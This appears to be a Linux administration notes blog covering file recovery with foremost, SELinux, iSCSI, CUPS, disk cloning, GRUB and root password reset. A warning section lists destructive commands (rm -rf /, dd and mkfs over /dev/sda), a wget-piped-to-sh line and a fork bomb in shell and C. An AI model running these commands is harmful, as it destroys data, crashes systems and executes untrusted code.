Recover deleted file with foremost

foremost(1) - Linux man page
Name
foremost - Recover files using their headers, footers, and data structures
Synopsis
foremost[-h][-V][-d][-vqwQT][-b][-o] [-t][-s][-i]
Builtin Formats

Recover files from a disk image based on file types specified by the user using the -t switch.

jpg
Support for the JFIF and Exif formats including implementations used in modern digital cameras.
gif
png
bmp
Support for windows bmp format.
avi
exe
Support for Windows PE binaries, will extract DLL and EXE files along with their compile times.
mpg
Support for most MPEG files (must begin with 0x000001BA)
wav
riff
This will extract AVI and RIFF since they use the same file format (RIFF). note faster than running each separately.
wmv
Note may also extract -wma files as they have similar format.
mov
pdf
ole
This will grab any file using the OLE file structure. This includes PowerPoint, Word, Excel, Access, and StarWriter
doc
Note it is more efficient to run OLE as you get more bang for your buck. If you wish to ignore all other ole files then use this.
zip
Note is will extract .jar files as well because they use a similar format. Open Office docs are just zip'd XML files so they are extracted as well. These include SXW, SXC, SXI, and SX? for undetermined OpenOffice files.
rar
htm
cpp
C source code detection, note this is primitive and may generate documents other than C code.
all
Run all pre-defined extraction methods. [Default if no -t is specified]

Description

Recover files from a disk image based on headers and footers specified by the user.

-h
Show a help screen and exit.
-V
Show copyright information and exit.
-d
Turn on indirect block detection, this works well for Unix file systems.
-T
Time stamp the output directory so you don't have to delete the output dir when running multiple times.
-v
Enables verbose mode. This causes more information regarding the current state of the program to be displayed on the screen, and is highly recommended.
-q
Enables quick mode. In quick mode, only the start of each sector is searched for matching headers. That is, the header is searched only up to the length of the longest header. The rest of the sector, usually about 500 bytes, is ignored. This mode makes foremost run considerably faster, but it may cause you to miss files that are embedded in other files. For example, using quick mode you will not be able to find JPEG images embedded in Microsoft Word documents.

Quick mode should not be used when examining NTFS file systems. Because NTFS will store small files inside the Master File Table, these files will be missed during quick mode.
-Q
Enables Quiet mode. Most error messages will be suppressed.
-w
Enables write audit only mode. No files will be extracted.
-a
Enables write all headers, perform no error detection in terms of corrupted files.
-b number
Allows you to specify the block size used in foremost. This is relevant for file naming and quick searches. The default is 512. ie. foremost -b 1024 image.dd

-k number
Allows you to specify the chunk size used in foremost. This can improve speed if you have enough RAM to fit the image in. It reduces the checking that occurs between chunks of the buffer. For example if you had > 500MB of RAM. ie. foremost -k 500 image.dd

-i file
The file is used as the input file. If no input file is specified or the input file cannot be read then stdin is used.
-o directory
Recovered files are written to the directory directory.
-c file
Sets the configuration file to use. If none is specified, the file "foremost.conf" from the current directory is used, if that doesn't exist then "/etc/foremost.conf" is used. The format for the configuration file is described in the default configuration file included with this program. See the CONFIGURATION FILE section below for more information.
-s number
Skips number blocks in the input file before beginning the search for headers. ie. foremost -s 512 -t jpeg -i /dev/hda1


Configuration File

The configuration file is used to control what types of files foremost
searches for. A sample configuration file, foremost.conf, is included with this distribution. For each file type, the configuration file describes the file's extension, whether the header and footer are case sensitive, the maximum file size, and the header and footer for the file. The footer field is optional, but header, size, case sensitivity, and extension are not!

Any line that begins with a pound sign is considered a comment and ignored. Thus, to skip a file type just put a pound sign at the beginning

of that line

Headers and footers are decoded before use. To specify a value in hexadecimal use \x[0-f][0-f], and for octal use \[1-9][1-9][1-9]. Spaces can be represented by \s. Example: "\x4F\123\I\sCCI" decodes to "OSI CCI".

To match any single character (aka a wildcard) use a ?. If you need to search for the ? character, you will need to change the wildcard line *and* every occurrence of the old wildcard character in the configuration file. Do not forget those hex and octal values! ? is equal to \x3f and \063.

There is a sample set of headers in the README file.

Examples
Search for jpeg format skipping the first 100 blocks
foremost -s 100 -t jpg -i image.dd
Only generate an audit file, and print to the screen (verbose mode)
foremost -av image.dd
Search all defined types

foremost -t all -i image.dd

Search for gif and pdf's

foremost -t gif,pdf -i image.dd

Search for office documents and jpeg files in a Unix file system in verbose mode.

foremost -vd -t ole,jpeg -i image.dd

Run the default case

foremost image.dd

recover file from ext3

#debugfs /dev/sdax
#lsdel
#ls -d
find appropriate
#dump <> new_filename

recover file from ext2 filesystem

apt-get install e2undel
#e2undel -d /dev/sdax -s /root/recovery -a -t
where
-d device from which files to be recover
-s where to save recovered files

selinux in debian

-Run apt-get install selinux-basics selinux-policy-refpolicy-targeted¹.

-Edit /boot/grub/menu.lst and add selinux=1 to your kernel command line (by adding it to the #kopt= line and then running update-grub). If you are using lilo, you must instead make similar changes to /etc/lilo.conf and run lilo.

-Fix dependencies listed. Below are the highlights. For a complete list please visit, http://wiki.debian.org/SELinux/Setup#package-specific):

• In /etc/pam.d/login uncomment the session required pam_selinux.so multiple" line. Do the same for /etc/pam.d/ssh
• In /etc/default/rcS set FSCKFIX=yes and add EDITMOTD=no. [Only important for 'strict' policy:] In /etc/init.d/bootmisc.sh search for "Update motd" and comment the two lines below that line. Then run rm /var/run/motd. Replace the symlink /etc/motd with a static "message of the day" file instead.
• Add no_static_dev="1" to /etc/udev/udev.conf to prevent udev from providing the /dev/.static directory.
• The cron package includes a daily cronjob to backup some system files, including /etc/shadow. For security reasons, you don't want cron to be able to read this file, so edit /etc/cron.daily/standard and disable the part making a backup of /etc/shadow and /etc/gshadow ( bug #333837).
• "locate" is part of fileutils, and a useful tool for finding files on your system. To work it however needs to scan your whole filesystem for files - which would require rather extensive SELinux permissions and might be considered an "information leak". Currently there is no SELinux policy for regular locate to work flawlessly, so it is recommended to disable it on SELinux boxes. To do this, insert an exit 0 as the second line of /etc/cron.daily/find.
• Check that the /selinux directory exists and if not, create it with mkdir /selinux.
• Run touch /.autorelabel and reboot
• Run touch /.autorelabel and reboot again
• Run check-selinux-installation

winodows troubleshooting..

to run chkdsk ..
>chkdsk /f


BOOTMGR not found
>bootrec /rebuildbcd
>bootrec /fixmbr
>bootrec /fixboot
>bootrec /scanos

how to smart card in debian/BOSS

install following packages,..
#apt-get install pcscd libccid libpcsclite1 libusb-0.1-4

Gemplus CCID Smart card reader drivers for Debian Sarge 3.1 Linux distribution
and x86 processor architecture.

Version 1.2.4, March 2006.

Before proceeding, you might want to check whether a new driver version
is available from http://support.gemplus.com/


1. Description
--------------
This archive contains DEB packages of the CCID device driver for the Gemplus
CCID based devices and the PCSC-Lite daemon.

The CCID device driver:
* libccid_1.2.4-0_i386.deb

The pcsc-lite :

( from http://www.backports.org/debian/pool/main/p/pcsc-lite/)

* libpcsclite1_1.2.9-beta9-0bpo1_i386.deb
* libpcsclite-dev_1.2.9-beta9-0bpo1_i386.deb
* pcscd_1.2.9-beta9-0bpo1_i386.deb

This archive contains the source code of the CCID device driver for
the Gemplus CCID based devices and the PCSC-Lite daemon.

The CCID device driver:
* ccid-1.2.4.tar.gz

The pcsc-lite:
* pcsc-lite-1.2.9-beta10.tar.gz

It requires:
* A Debian Sarge 3.1 platform based on a x86 processor architecture,
* A Gemplus CCID based device

If you intend to use this driver with a different configuration (such
as a non x86 platform), please contact the support at the address
indicated at the very end of this document.


2. Installation
---------------

- Install the driver: # dpkg -i libccid_1.2.4-0_i386.deb

- Install the pcscd provided with this package:
# dpkg -i pcscd_1.2.9-beta9-0bpo1_i386.deb
libpcsclite-dev_1.2.9-beta9-0bpo1_i386.deb
libpcsclite1_1.2.9-beta9-0bpo1_i386.deb

The pcsc-lite daemon will (re)start automatically during installation.


3. Troubleshooting
------------------

For some Linux distributions, the pcmcia daemon should be loaded after
the pcscd daemon. As the pcscd daemon does not manage PCMCIA smart card
reader as hotplug devices, it might not take into account your GemPCCard
presence. To solve this issue, please restart the pcscd daemon as
explained below:

# /etc/init.d/pcscd restart



4. Support
----------

In case of problem, please contact Gemplus through the Gemplus web site
(http://www.gemplus.com/) or depending on your location:

For North America
email: HOTLINEUSA@gemplus.com

For ASIA
email: ASIA.hotline@gemplus.com

For other countries
email: hotline@gemplus.com

----------------------------------------------------------------------

how to extract/create initrd.img ??

Extracting initrd..
#mkdir initrd_test

#cd initrd_test

#gzip -dc < /boot/initrd.img | cpio -i


creating initrd..
#cd initrd_test
#find . | cpio -o -c | gzip -9 > /boot/initrd.img

what is typeof??

#include

int main()
{
int a=12;
typeof (a) b; //same as int b
b=123;
printf("b is %d \n a is %d \n",b,a);
return 0;
}

Finding out processor is little or big endian using c program

#include
int main()
{
int num=1;
char *cptr;

cptr = (char *)#

if (*cptr)
printf ("little endian\n");
else
printf ("big endian\n");
return 0;
}
...........................
for little endian it stores 00000001
for big endian it stores 00010000

Converting Ext2 Filesystems to Ext3

Ext2 is a fragmentation, redundant enough to be reliably regenerated on error yet diskspace efficient, fast, and adaptable. But when the computer is rebooted or powered off without correctly shutting down, Ext2 filesystems are placed in an error state. When the computer comes back up, the user is confronted with some mildly confusing, and very intimidating, messages and choices. Should he let the filesystem correct itself? Warning, this can lose data!
Journalized filesystems are made to eliminate such error messages.
You can boot with Linux Live CD (BOSS Live CD)
do following steps..

Converting from Ext2 to Ext3

Log in as root

• umount /dev/hda10 //where hda10 is a device,on which filsystem we want to convert
  
• If you can't unmount it, then remount it read only (mount -o remount,ro /dev/hda10)
• tune2fs -j /dev/hda10
• Edit /etc/fstab, and for /dev/hda10, change ext2 to ext3
• mount /dev/hda10
• /sbin/shutdown -h now
• mount | grep /dev/hda10
  • If it's not shown as ext3, reboot, if still not, troubleshoot
  • Otherwise, you're done

if still you are getting error in # dmesg |tail for command #mount /dev/hda10 /mnt ..

JBD: no valid journal superblock found:

..means still journal is not created run this command once again #tune2fs -j /dev/hda10
if your / was ext2 and now you have converted in ext3 then we require to recreate initrd.
#cd /boot
#mv /boot/initrd.img-2.6.22-3-486 /boot/initrd.img-2.6.22-3-486_bkup
#mkinitrd initrd.img-2.6.22-3-486
#reboot

Converting from Ext3 back to Ext2

• umount /dev/hda10
  
• tune2fs -O ^has_journal /dev/hda10
• e2fsck /dev/hda10
• Edit /etc/fstab to change /dev/hda10 to mount type ext2
• mount /dev/hda10
  

Linux tgtadm: Setup iSCSI Target ( SAN )

Linux target framework (tgt) aims to simplify various SCSI target driver (iSCSI, Fibre Channel, SRP, etc) creation and maintenance. The key goals are the clean integration into the scsi-mid layer and implementing a great portion of tgt in user space.

The developer of IET is also helping to develop Linux SCSI target framework (stgt) which looks like it might lead to an iSCSI target implementation with an upstream

kernel component. iSCSI Target can be useful:

a] To setup stateless server / client (used in diskless setups).
b] Share disks and tape drives with remote client over LAN, Wan or the Internet.
c] Setup SAN - Storage array.
d] To setup loadbalanced webcluser using cluster aware Linux file system etc.

In this tutorial you will learn how to have a fully functional Linux iSCSI SAN using tgt framework.

iSCSI target (server)

Storage resource located on an iSCSI server known as a "target". An iSCSI target usually represents nothing but hard disk storage. As with initiators, software to provide an iSCSI target is available for most mainstream operating systems.

iSCSI initiator (client)

An initiator functions as an iSCSI client. An initiator typically serves the same purpose to a computer as a SCSI bus adapter would, except that instead of physically cabling SCSI devices (like hard drives and tape changers), an iSCSI initiator sends SCSI commands over an IP network.

Debian / Ubuntu Linux Install tgt

Type the following command to install Linux target framework user-space tools:
$ sudo apt-get install tgt

CentOS / RHEL / Red Hat Linux Install tgt

RHEL 5.2 and older version do not have tgt tools. However, RHEL 5.3 (preview version) comes with tgt tools.

tgtadm - Linux SCSI Target Administration Utility

tgtadm is used to monitor and modify everything about Linux SCSI target software: targets, volumes, etc. This tool allows a system to serve block-level SCSI storage to other systems that have a SCSI initiator. This capability is being initially deployed as a Linux iSCSI target, serving storage over a network to any iSCSI initiator.

Start tgtd

To start the tgtd, enter:
# /usr/sbin/tgtd
Under RHEL 5.3 to start the tgtd service, enter:
# /etc/init.d/tgtd start

Define an iscsi target name

The following example creates a target with id 1 (the iqn is 19 iqn.2001-04.com.example:storage.disk2.amiens.sys1.xyz) and adds a 20 logical unit (backed by /dev/hdc1) with lun 1.
# tgtadm --lld iscsi --op new --mode target --tid 1 -T iqn.2001-04.com.example:storage.disk2.amiens.sys1.xyz

To view the current configuration, enter:
# tgtadm --lld iscsi --op show --mode target
Sample output:

Target 1: iqn.2001-04.com.example:storage.disk1.amiens.sys1.xyz
   System information:
       Driver: iscsi
       Status: running
   I_T nexus information:
   LUN information:
       LUN: 0
           Type: controller
           SCSI ID: deadbeaf1:0
           SCSI SN: beaf10
           Size: 0
           Online: No
           Poweron/Reset: Yes
           Removable media: No
           Backing store: No backing store
   Account information:
   ACL information:

Add a logical unit to the target (/dev/sdb1):
# tgtadm --lld iscsi --op new --mode logicalunit --tid 1 --lun 1 -b /dev/sdb1

A note about home computer / test system

Most production boxes will only use iSCSI root with real iSCSI devices, but for testing purposes it can be quite useful to set up an iSCSI target on your image server. This is useful for testing and learning iSCSI target and iSCSI initiator at home, simply use filesystem for testing purpose. Use dd command to create diskbased filesystem:
# dd if=/dev/zero of=/fs.iscsi.disk bs=1M count=512
Add /fs.iscsi.disk as a logical unit to the target:
# tgtadm --lld iscsi --op new --mode logicalunit --tid 1 --lun 1 -b /fs.iscsi.disk
Now, you should able to view details:
# tgtadm --lld iscsi --op show --mode target
Sample output:

Target 1: iqn.2001-04.com.example:storage.disk1.amiens.sys1.xyz
   System information:
       Driver: iscsi
       Status: running
   I_T nexus information:
   LUN information:
       LUN: 0
           Type: controller
           SCSI ID: deadbeaf1:0
           SCSI SN: beaf10
           Size: 0
           Online: No
           Poweron/Reset: Yes
           Removable media: No
           Backing store: No backing store
       LUN: 1
           Type: disk
           SCSI ID: deadbeaf1:1
           SCSI SN: beaf11
           Size: 512M
           Online: Yes
           Poweron/Reset: Yes
           Removable media: No
           Backing store: /fs.iscsi.disk
   Account information:
   ACL information:

Accept iSCSI Target

To enable the target to accept any initiators, enter:
# tgtadm --lld iscsi --op bind --mode target --tid 1 -I ALL
This should open network port # 3260:
# netstat -tulpn | grep 3260
Sample output:

tcp        0      0 0.0.0.0:3260            0.0.0.0:*               LISTEN      27328/tgtd
tcp6       0      0 :::3260                 :::*                    LISTEN      27328/tgtd      

And you are done. Your system is configured as iSCSI Target. Remote client computer can access this computers hard disk over network. Your can use cluster aware filesystem to setup real shared storage for small business. Open TCP port 3260 in your firewall, if required.

How do I access iSCSI Target (server) via iSCSI initiator (client)?

See detailed os specific iSCSI initiator instuctions:

1. RHEL 4 or RHEL 5 Linux iSCSI initiator tutorial.
2. Debian Linux iSCSI initiator tutorial.
3. FreeBSD iSCSI initiator tutorial.
4. Windows iSCSI initiator tutorial.

Following is a quick way to access iSCSI target, under RHEL 5. Let us say your server iSCSI Target IP is 192.168.1.2. Type the following command to discover targets at a given IP address such as 192.168.1.2 (use 127.0.0.1 if you are testing it from same computer):
# iscsiadm --mode discovery --type sendtargets --portal 192.168.1.2
OR
# iscsiadm --mode discovery --type sendtargets --portal 127.0.0.1
Sample output:

127.0.0.1:3260,1 iqn.2001-04.com.example:storage.disk1.amiens.sys1.xyz

Login to the iscsi target session:
# iscsiadm --mode node --targetname iqn.2001-04.com.example:storage.disk1.amiens.sys1.xyz --portal 192.168.1.2:3260 --login
OR
# iscsiadm --mode node --targetname iqn.2001-04.com.example:storage.disk1.amiens.sys1.xyz --portal 127.0.0.1:3260 --login
Verify that login was successful:
# tail -f /var/log/messages
Sample output:

Nov 11 07:34:04 vivek-desktop kernel: [ 9039.562312] scsi 6:0:0:1: Direct-Access     IET      VIRTUAL-DISK     0001 PQ: 0 ANSI: 5
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572268] sd 6:0:0:1: [sdc] 1048576 512-byte hardware sectors (537 MB)
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572374] sd 6:0:0:1: [sdc] Write Protect is off
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572530] sd 6:0:0:1: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572715] sd 6:0:0:1: [sdc] 1048576 512-byte hardware sectors (537 MB)
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572790] sd 6:0:0:1: [sdc] Write Protect is off
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572940] sd 6:0:0:1: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.572946]  sdc: unknown partition table
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.573492] sd 6:0:0:1: [sdc] Attached SCSI disk
Nov 11 07:34:04 vivek-desktop kernel: [ 9039.573593] sd 6:0:0:1: Attached scsi generic sg4 type 0

sdc is new scsi disk. You may need to restart iSCSI to probe partition and check disks:
# service iscsi restart
# partprobe
# fdisk -l
You can now create parition and mount file system using usual fdisk and mkfs.ext3 commands:
# fdisk /dev/sdc
# mkfs.ext3 /dev/sdc1mkdir /iscsi
# mkdir /iscsi
# mount /dev/sdc1 /iscsi
# df -H
Sample output:

Filesystem             Size   Used  Avail Use% Mounted on
/dev/sda2               99G    30G    64G  32% /
tmpfs                  1.1G      0   1.1G   0% /lib/init/rw
varrun                 1.1G   361k   1.1G   1% /var/run
varlock                1.1G      0   1.1G   0% /var/lock
udev                   1.1G   2.9M   1.1G   1% /dev
tmpfs                  1.1G   312k   1.1G   1% /dev/shm
/dev/sda1              105G    32G    73G  31% /media/sda1
/dev/sda5              294G   275G    20G  94% /share
/dev/sdb2              247G   119G   116G  51% /disk1p2
/dev/sdc1              520M    11M   483M   3% /iscsi

Sharing Linux Printers Across Multiple Subnets

Sharing Linux Printers Across Multiple Subnets

1)Configuring CUPS For Two Subnets

All you need to make this work are a central Linux/CUPS printer server, and one Linux PC per subnet to act as a relay printer server.

Let's say you have two subnets, 192.168.1.0/24 and 192.168.2.0/24. You need to have routing already configured to pass traffic between the two subnets, so everyone can ping everyone. Let's say you have your CUPS printer server at 192.168.1.10, and you want computers on 192.168.2.0/24 to be able to use it. This is a complete, barebones example CUPS configuration for 192.168.1.10:

##/etc/cups/cupsd.conf
LogLevel warning

#this varies; check your distribution
SystemGroup lpadmin

# Allow remote users to access this server
Port 631
Listen /var/run/cups/cups.sock

# Enable printer sharing
Browsing On
BrowseAllow all
BrowseAddress 192.168.1.255
BrowseAddress 192.168.2.255
DefaultAuthType Basic


# Allow shared printing
Order allow,deny
Allow 192.168.1.0/24
Allow 192.168.2.0/24



# Only local users can access Web admin pages
Order allow,deny
Allow localhost



# Only local system users can access config files
AuthType Basic
Require user @SYSTEM
Order allow,deny
Allow localhost

You may use hostnames in place of IP addresses. Then restart CUPS, either /etc/init.d/cupsys restart on Debian-ish systems, or /etc/init.d/cup restart on Fedora/Red Hat-ish systems.

Setting Up the Relay PC

Pick one computer in the 192.168.2.0/24 network to act as your "relay" server; it will contact the printer server and then relay its printers to the rest of the 192.168.2.0/24 subnet. Just add these lines to cupsd.conf:

BrowsePoll 192.168.1.10
BrowseRelay 127.0.0.1 192.168.2.255



# Allow shared printing
Order allow,deny
Allow 192.168.2.0/24

Restart CUPS, and in half a minute or so all the computers on 192.168.2.0/24 should see all the printers that are physically attached to the server at 192.168.1.10. What if you have more than one printer server to share? Then add a line for each server like this:

BrowsePoll 192.168.1.10
BrowsePoll 192.168.1.15
BrowsePoll 192.168.1.20
BrowseRelay 127.0.0.1 192.168.2.255

This is nice and efficient because all you need is one PC per subnet to act as the relay.

You can easily test all of this from the comfort of your secret armored underground network administrator lair, because of course you have OpenSSH set up all over your network so that you can securely log in to all hosts and do stuff. First log into your relay computer, then use lpstat to see what printers are available:

$ lpstat -v
device for HP_LaserJet_3050: ipp://uberpc.alrac.net:631/printers/HP_LaserJet_3050
device for HP_LaserJet_6L_LPT_parport0_HPLIP: ipp://xena.alrac.net:631/
printers/HP_LaserJet_6L_LPT_parport0_HPLIP
device for tp0: ipp://uberpc.alrac.net:631/printers/tp0

Now that is a happy sight; you can see printers from two different printer servers. You can see if they are ready to use:

$ lpstat -a HP_LaserJet_3050
HP_LaserJet_3050 accepting requests since Tue 18 Dec 2007 07:07:39 PM PST

You can even print a test page remotely:

$ lpr -P HP_LaserJet_3050 /etc/cups/cupsd.conf

CUPS relies on polling to notify the entire network about what printers are up. By default each CUPS server send out an 80-byte broadcast packet every thirty seconds. If this gets to be too much, or if your printer setup doesn't change very often, you can change this behavior:

BrowseInterval  360
BrowseTimeout 600

This polls the network every six minutes, and if any CUPS server does not respond within ten minutes it is removed from the browse list.

If you want to also serve Windows clients, simply set up a Samba printer share in the usual way, and use Samba's own access controls to cross subnets.

So there you are- as easy as falling over and a lot more fun

Never Run these commands....on Linux...

#rm -rf /
#any_command > /dev/sda
#mkfs.ext3 /dev/sda
#mv /home/my_home_directory/* /dev/null
#dd if=/dev/urandom of=/dev/sda
Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:
#wget http://some_untrusted_source -O- | sh
The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.

ForkBomb:the processes recursively fork until a denial of service or a crash occurs
#:(){ :|:& };:

similar in c...

#include 

int main(int argc, char* argv[])
{
 while(1)
   fork();
 return 0;
}

CDROM is not getting ejected in Linux

open /etc/sysctl.conf file and edit dev.cdrom.lock parameter value to 0 as follow
dev.cdrom.lock=0

Clone your BOSS installation onto a new hard disk

Requirement:
BOSS Live CD,
Two Harddisks

Preparing to clone

Before starting, it's a good idea to do three things in preparation. First, back up all valuable personal files to CD/DVD-R/RW disc, a USB keystick, or an external hard disk. The instructions that follow involve drastic fundamental disk management and the possibility of data loss.

Second, it's a good idea to check the filesystem of the original hard disk for errors and possibly enact repairs. Ideally, you should check the Windows filesystem for errors too.

Third, remove any USB memory sticks, card readers, or other kinds of attachable storage, such as MP3 players or mobile phones. This will avoid confusion when partitioning.

After all this, open a terminal window, and type the command sudo fdisk -l, which will scan the hard disks and list their partitions. Here are the results from my test system:

Disk /dev/sda: 81.9 GB, 81964302336 bytes
255 heads, 63 sectors/track, 9964 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x1c381c37

Device  Boot   Start      End      Blocks   Id  System
/dev/sda1    *       1     4742    38090083+   7  HPFS/NTFS
/dev/sda2         4743     9964    41945715    5  Extended
/dev/sda5         4743     9744    40178533+  83  Linux
/dev/sda6         9745     9964     1767118+  82  Linux swap/Solaris

Disk /dev/sdb: 120.0 GB, 120034123776 bytes
255 heads, 63 sectors/track, 14593 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0xb94838a4

Disk /dev/sdb doesn't contain a valid partition table

Two hard disks are listed in the results: look for the headings Disk /dev/sda and Disk /dev/sdb. Beneath each heading is technical information about the disk, and beneath that the partitions on that disk are listed.

It should be obvious that, on my test computer, /dev/sdb is the new hard disk because it has no partitions (it "doesn't contain a valid partition table"), while /dev/sda has the standard partition layout of an BOSS system. Yours will probably be similar, if not identical.

Look for the reference to your new hard disk and make a note of it. In my case, I make a note of /dev/sdb. Then type sudo cfdisk -z /dev/sdb to start the cfdisk partitioning program, which we'll use to write an initial partition table to the disk. If necessary, replace /dev/sdb with the details of the new hard disk you discovered earlier. When cfdisk starts, type W (note that's Shift+w) and then type yes to write a blank partition table. Then press q to quit cfdisk. You can ignore the handful of minor errors that are reported.

Cloning the disk

Now that we have this information, we can install ddrescue and use it to clone the disk. This needs to be installed because it isn't a default system tool. Although the computer is running the BOSS install CD live distro mode,

After this, type sudo apt-get install gddrescue at the prompt to install ddrescue.

Use ddrescue by first specifying the old hard disk, then the new hard disk. Add the -v command option to provide a status report as the command progresses:

$ sudo ddrescue -v /dev/sda /dev/sdb

It's extremely important that you ensure you get the old and new disks in the right order. Otherwise, you might well overwrite the data on your old disk!

Once the cloning has finished -- it will probably take an hour or more, depending on the size of the original hard disk -- you should shut down the computer, remove the old disk (you must disconnect the old disk before you can continue!), and boot from the cloned copy to test things. If you use Windows XP/Vista, it might object to a new hard disk as part of its Windows Genuine Advantage system, and you might have to revalidate online. Of course, BOSS work fine without any such worries.

Assuming everything works correctly, you can move on to the next step: expanding the partitions to take advantage of the larger hard disk.

Expanding the partitions

Before attempting to expand the partitions, it's a good idea to check that your BOSS partition's filesystem is sound. To do this, boot into the BOSS install CD's live distro mode as before. Open a terminal window and type the command sudo fsck.ext3 -f /dev/sda5 to perform a disk check (assuming that BOSS is installed alongside Windows on your hard disk in the standard configuration).

Once this has completed, close the terminal window and click System -> Administration -> Partition Editor. What happens next depends on your requirements. If you just want to expand the BOSS partition, follow these steps:

1. In the Partition list, right-click the linux-swap entry and select Swap off. This will stop BOSS live distro mode from accessing the swap partition so that it can be moved on the hard disk.
2. Before anything else can happen, you must resize the extended partition that contains BOSS. Right-click the extended entry in the list and select Resize/Move. In the dialog box that appears, change the Free Space Following (MiB) box to read 0, then press Tab. This will cause the partition to be expanded to fill the space. Click the Resize/Move button when done. Bear in mind that no changes are carried until you click the Apply button, which you will do after making all the changes to the disk's partitions.
3. Right-click the linux-swap partition once again, and select Resize/Move. In the dialog box that appears, click and drag the graphical representation of the partition to the end of the free space (in other words, click and drag it to the right of the graphical display). After this, the Free Space Following (MiB) box should read 0. Click Resize/Move.
4. Back in the main GParted program window, right-click the ext3 entry in the list, and select Resize/Move. Click and drag the rightmost edge of the partition in the graphical representation so that it "grows" to fill the free space. Eventually the Free Space Following (MiB) box will read 0. When this is the case, click the Resize/Move button.
5. Finally, click the Apply button on the main GParted toolbar. Then click Apply in the dialog box that appears, and sit back and wait while the partitions are moved and resized. If you want to see what's happening, click the small arrow alongside Details in the Applying pending operations dialog box.
6. When GParted has finished, close the program, then open a terminal window. Enter sudo fsck.ext3 -f /dev/sda5, which will once again check the BOSS partition for errors (and, again, these steps assume that BOSS is installed alongside Windows on your hard disk in the standard configuration). If there are any errors, you'll be prompted to repair them. Usually you can agree to the repair.

After the filesystem check, you can reboot your computer from the new hard disk. You should find BOSS partition is now larger.

If you want to resize your Windows partition too, these steps are still relevant. However, you will have to move the swap and ext3 partitions, as well as the extended partition containing them, before resizing the NTFS partition.

ATI radeonX300 driver in debian

#apt-get install fglrx-driver


Then modify /etc/X11/XF86Config-4 or /etc/X11/xorg.conf:

   
Section "Device"
       Identifier      "ATI"
       Driver          "fglrx"
       Option "VideoOverlay" "on"
       Option "OpenGLOverlay" "off"
       Option "UseInternalAGPGART" "no"
EndSection

...

Section "Screen"
 ...
       SubSection "Display"
               Depth           24
               Modes           "1280x1024"

how to install intel wifi driver in linux

get driver and firmware from intel site http://intellinuxwireless.org/?p=iwlwifi
extract firmware and copy in /lib/firmware/
how to compile driver
extract driver source
make
make install
...

how to open .chm file in linux?

Chm file is a Microsoft Compressed HTML Help file in a proprietary format for online help files. Under Linux/FreeBSD or UNIX you can open .chm file using following three different programs which makes it possible to browse native Windows CHM files:

Install chm viewer

Use apt-get or yum command to install chm viewer:
# apt-get install gnochm
OR
# apt-get install kchmviewer

How to open:

double click the .chm file. or

Gnome Desktop User

Use gnochm program as follows
$ gnochm file.chm

KDE Desktop User

Use kchmviewer (very nice and highly recommended) program as follows
$ kchmviewer file.chm

Other tool

xchm program is quite outdated but works:
$ xchm file.chm

how to install fonts in linux

Open the File Browser , Applications -> System Tools -> File Browser and type fonts:/// in the text location top.

Once the Fonts are installed, restart the application in which ever you want the font to get affected. Else, logout and login, to see the fonts installed.

forgot root password

I forgot root password.How can I retrieve it?

Restart your system

When the grub screen appears, where OS label entry is displayed like,RED HAT,Ubuntu,BOSS etc. then select your linux and press 'e' to edit.

Now, another screen appears, where you can see the lines like root(hd0,x) ,kernel ,initrd etc.

• select kernel parameter line, (2nd line) using arrow keys and press 'e' key again and go to the end of the line and type the following there

init=/bin/sh

• Now press 'b' key to boot
• this boots u into the minimal mode
• after it boots up, you will come to a screen where a prompt like sh#
• here, Give the following commands

Give the following commands

#mount -n -o remount,rw /

#mount -avt nonfs,noproc,nosmbfs

#passwd
enter new passwd:xxxxxx
Reenter new passwd:xxxxxx


Reboot the system .

Tips for GRUB installation.

Whenever you reinstall Windows with an existing Linux installation already present on the hard drive, the MBR gets an overwrite. You can restore GRUB to the previous settings by booting a Linux Live CD or you can download it from http://bosslinux.in/downloads/downloads/iso-images/ and following the steps below:

1. Insert the Live CD and reboot your computer;

2. After reaching the desktop, open up a Terminal and do a su - to access the root account. In BOSS default root password is root.In Ubuntu you’ll have to previously give a password to the root account with sudo passwd root;

3. Type grub in the root prompt;

#grub

4. The Grub prompt has appeared and you should type find /boot/grub/stage1 in it then hit Enter. You’ll get an output which tells where the grub is available in your system.

grub>find /boot/grub/stage2

(hd0,5)
(hd0,6)
(hd0,7)

5. Type #root(hd0,x) where x is number from last command output then hit Enter;

6. Type #setup(hd0,x) and hit Enter;

7. Type #quit and hit Enter;

8. Reboot the system and remove the Live CD from the tray.

another way to do same grub installation.

#grub-install --recheck --no-floppy --root-directory=DIR device_name

grub-install copies GRUB images into the DIR/boot directory specfied by
--root-directory.

--recheck
probe a device map even if it already exists

--recheck
probe a device map even if it already exists

example

#grub-install --no-floppy --recheck root-directory=/mnt/disk[sda6] /dev/sda6